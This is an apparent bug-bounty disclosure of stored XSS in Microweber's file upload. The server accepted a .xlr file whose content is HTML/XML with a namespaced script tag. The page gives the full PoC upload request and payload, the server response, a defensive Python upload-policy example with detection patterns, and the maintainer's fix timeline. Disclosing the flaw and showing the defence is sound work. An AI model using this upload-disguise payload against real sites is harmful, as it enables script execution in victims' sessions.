Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber

Valid

Reported on

Jul 2nd 2022


Description

In the file upload function, the server allows uploading a .xlr file whose content is actually HTML/XML containing JavaScript; because the stored file is served back from the same origin, this leads to stored XSS.

Proof of Concept

REQUEST

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Ashop/action%3Aproducts%23action%3Dnew%3Aproduct; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/admin/view:shop/action:products
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="name"

xss_poc.xlr
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunk"

0
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="chunks"

1
-----------------------------80883503232369887683205133266
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>
-----------------------------80883503232369887683205133266--

RESPONSE

HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss-poc.xlr","name":"xss-poc.xlr","bytes_uploaded":"959"}
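The root cause above is that the upload handler trusts the ".xlr" extension and never looks at the bytes, then serves the stored file from the application's own origin. The following is an added defender-side example (not Microweber's code, and not the fix referenced later on this page): a small upload policy that checks the extension against an allowlist, sniffs the first bytes for HTML/XML active content regardless of extension, and, for accepted files, returns the response headers that keep a browser from rendering the file as a document. The allowlist, the header set and the benign sample bytes are assumptions made for the example; the rejected payload is the PoC body from this report.

```python
import re
from typing import Dict, Tuple

# Assumed allowlist for the example; not Microweber's real configuration.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "xlr", "xls", "csv"}

# Markers that make a payload browser-executable if served inline.
# The namespaced form covers tags such as <a:script xmlns:a="...">, as used in the PoC.
_ACTIVE_CONTENT = re.compile(
    rb"<\s*(?:[a-z0-9_-]+:)?script\b"
    rb"|<\s*(?:[a-z0-9_-]+:)?svg\b"
    rb"|<\s*(?:[a-z0-9_-]+:)?(?:html|body|iframe|object|embed)\b",
    re.IGNORECASE,
)
# A file that opens as an XML/HTML document is not a spreadsheet whatever its extension says.
_XML_OR_HTML_HEAD = re.compile(rb"^\s*(?:<\?xml|<!doctype\s+html|<html)", re.IGNORECASE)

_SAFE_NAME = re.compile(r"[^A-Za-z0-9._-]")


def looks_like_active_content(data: bytes, sniff_len: int = 4096) -> bool:
    """Content sniff on the leading bytes: True if the upload is HTML/XML with script-capable tags."""
    head = data[:sniff_len]
    return bool(_XML_OR_HTML_HEAD.match(head) or _ACTIVE_CONTENT.search(head))


def extension_of(filename: str) -> str:
    """Lower-cased final extension, '' if the name has none."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def safe_download_name(filename: str) -> str:
    """Strip directory parts and any character that could break the Content-Disposition header."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return _SAFE_NAME.sub("-", base) or "download"


def upload_decision(filename: str, data: bytes) -> Tuple[bool, str, Dict[str, str]]:
    """Return (accepted, reason, headers_to_serve_with).

    Extension allowlisting alone is what the vulnerable endpoint did; the content sniff
    is the check that actually stops an HTML/XML document disguised as .xlr.
    """
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not in allowlist", {}
    if looks_like_active_content(data):
        return False, "content sniffs as HTML/XML with active content", {}
    # Even for accepted files, never let the browser render them as a page of this origin.
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_download_name(filename)}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return True, "accepted", headers


# The multipart "file" part from the PoC request above.
POC_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info><name><value>123</value></name></info>
    </body>
</html>"""

# Constructed benign sample: an OLE2 compound-file header (the container real .xlr files use)
# followed by zero padding. Not a real spreadsheet, just enough to show the policy accepts binary.
BENIGN_XLR = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64


if __name__ == "__main__":
    for name, blob in (("xss_poc.xlr", POC_PAYLOAD), ("report.xlr", BENIGN_XLR), ("page.html", b"<html>")):
        ok, why, hdrs = upload_decision(name, blob)
        print(f"{name}: {'ACCEPT' if ok else 'REJECT'} ({why}) {hdrs}")
```

The two checks are deliberately independent: the allowlist stops obviously dangerous extensions, while the sniff catches the case this report exploits, a permitted extension wrapping a browser-renderable document. The headers on the accept path are the second layer; `nosniff` plus `attachment` means that even a file the sniff misses is downloaded rather than executed in the application's origin.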

PoC Image

[screenshot not reproduced in this text export]

Impact

This vulnerability allows arbitrary JavaScript to execute in the context of the application's origin, which can be used to perform HTTP requests, carry out CSRF, read the content of same-origin pages, etc.

We are processing your report and will contact the microweber team within 24 hours. (a month ago)
Nhien.IT modified the report (a month ago)
Nhien.IT modified the report (a month ago)
We have contacted a member of the microweber team and are waiting to hear back (a month ago)
Peter Ivanov modified the Severity from Medium to Low (a month ago)
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability (a month ago)
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 39797c (a month ago)
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
Peter Ivanov
a month ago

Maintainer


Thanks for the report. In order to upload the .xlr file you need to be logged in as admin

Nhien.IT
a month ago

Researcher


Yah! Thank you, sir!
